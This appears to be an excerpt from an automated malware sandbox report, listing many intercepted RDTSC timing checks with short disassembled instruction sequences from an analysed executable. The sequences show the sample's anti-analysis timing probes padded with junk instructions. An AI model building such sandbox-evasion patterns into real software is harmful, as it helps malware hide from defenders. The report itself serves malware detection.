Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E7703 second address: 7E771A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F28C4758083h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F20E3 second address: 7F20E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F20E7 second address: 7F20EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F20EB second address: 7F20F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F20F5 second address: 7F20F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F20F9 second address: 7F20FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F20FF second address: 7F2108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F0010 second address: 7F002D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F28C47EE2B6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jmp 00007F28C47EE2BEh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F002D second address: 7F0033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F0033 second address: 7F0039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F0039 second address: 7F003D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F0197 second address: 7F019B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F065B second address: 7F065F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F065F second address: 7F0669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F0669 second address: 7F067C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C475807Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F067C second address: 7F0680 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F098C second address: 7F0998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F28C4758076h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F150E second address: 7F151F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F28C47EE2B6h 0x0000000a jg 00007F28C47EE2B6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F1D6E second address: 7F1D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FC4AF second address: 7FC4C7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F28C47EE2B8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F28C47EE2BEh 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FC4C7 second address: 7FC4E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C4758085h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FC4E0 second address: 7FC4EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F28C47EE2B6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FC932 second address: 7FC936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FCCE6 second address: 7FCD02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FCE50 second address: 7FCE6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F28C475807Fh 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80680F second address: 806836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F28C47EE2C6h 0x0000000b popad 0x0000000c jne 00007F28C47EE2BEh 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 806836 second address: 80683A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80683A second address: 806840 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 806840 second address: 80686C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F28C4758080h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F28C4758084h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804EA7 second address: 804EAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804EAB second address: 804EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80540E second address: 805414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 805414 second address: 805422 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C475807Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 805422 second address: 805440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edi 0x0000000a popad 0x0000000b pushad 0x0000000c jo 00007F28C47EE2B8h 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jne 00007F28C47EE2B6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 805440 second address: 805444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 805880 second address: 805884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 805884 second address: 8058B2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F28C4758076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F28C475807Eh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F28C4758080h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8058B2 second address: 8058C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F28C47EE2B6h 0x0000000a popad 0x0000000b jno 00007F28C47EE2BCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80C313 second address: 80C317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80C317 second address: 80C31D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81A65B second address: 81A65F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8207A8 second address: 8207AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82FF0D second address: 82FF13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 833A35 second address: 833A42 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 833A42 second address: 833A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F28C4758083h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 833A5F second address: 833A69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 741C19 second address: 741C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 741C21 second address: 741C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 839B93 second address: 839B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F28C4758076h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 839B9F second address: 839BA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 839D19 second address: 839D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 839D23 second address: 839D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83E5B4 second address: 83E5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F28C4758081h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 841058 second address: 84105E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84105E second address: 841073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F28C475807Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 841073 second address: 841079 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 841079 second address: 84107F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84107F second address: 841089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F28C47EE2B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85011B second address: 850121 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8519A5 second address: 8519A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8519A9 second address: 8519AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 851822 second address: 85183B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F28C47EE2C3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85183B second address: 85183F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84B853 second address: 84B857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85F9F2 second address: 85FA01 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85F68A second address: 85F697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85F697 second address: 85F69B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85F69B second address: 85F6AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85F6AE second address: 85F6CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758088h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85F6CC second address: 85F6D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8754D5 second address: 875500 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F28C4758081h 0x0000000d jmp 00007F28C4758082h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 875500 second address: 875504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 875504 second address: 87550C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87550C second address: 875528 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F28C47EE2C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 875528 second address: 87552C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 874468 second address: 87446E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87446E second address: 87449E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F28C475807Eh 0x0000000a pop edx 0x0000000b push edx 0x0000000c jmp 00007F28C4758087h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 874E19 second address: 874E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 874E1D second address: 874E44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F28C4758076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F28C4758085h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 874E44 second address: 874E4E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F28C47EE2B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 874E4E second address: 874E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 875016 second address: 875029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2BBh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 875029 second address: 87502D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87502D second address: 875056 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C1h 0x00000007 jnp 00007F28C47EE2B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jnp 00007F28C47EE2B8h 0x00000018 pushad 0x00000019 popad 0x0000001a push esi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 875056 second address: 875065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F28C4758076h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8782E2 second address: 8782E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8782E6 second address: 8782EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8782EA second address: 8782F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8782F5 second address: 87830F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F28C475807Fh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87AF36 second address: 87AF4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C47EE2C3h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87AF4E second address: 87AF54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87AF54 second address: 87AF66 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F28C47EE2B6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87AF66 second address: 87AF90 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 mov dl, EFh 0x0000000a push 00000004h 0x0000000c mov dl, 79h 0x0000000e call 00007F28C4758079h 0x00000013 push ebx 0x00000014 jl 00007F28C475807Ch 0x0000001a je 00007F28C4758076h 0x00000020 pop ebx 0x00000021 push eax 0x00000022 push edi 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87AF90 second address: 87AFF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jc 00007F28C47EE2D4h 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 je 00007F28C47EE2C4h 0x0000001b jmp 00007F28C47EE2BEh 0x00000020 jmp 00007F28C47EE2C1h 0x00000025 popad 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d jne 00007F28C47EE2B6h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87B27D second address: 87B283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0273 second address: 4EC02A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F28C47EE2BDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC02A0 second address: 4EC02BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f mov ch, ABh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC02BE second address: 4EC02D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 mov dl, 5Dh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC02D0 second address: 4EC02D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC02D4 second address: 4EC02D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC02D8 second address: 4EC02DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC02DE second address: 4EC0302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0302 second address: 4EC031F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC031F second address: 4EC0324 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
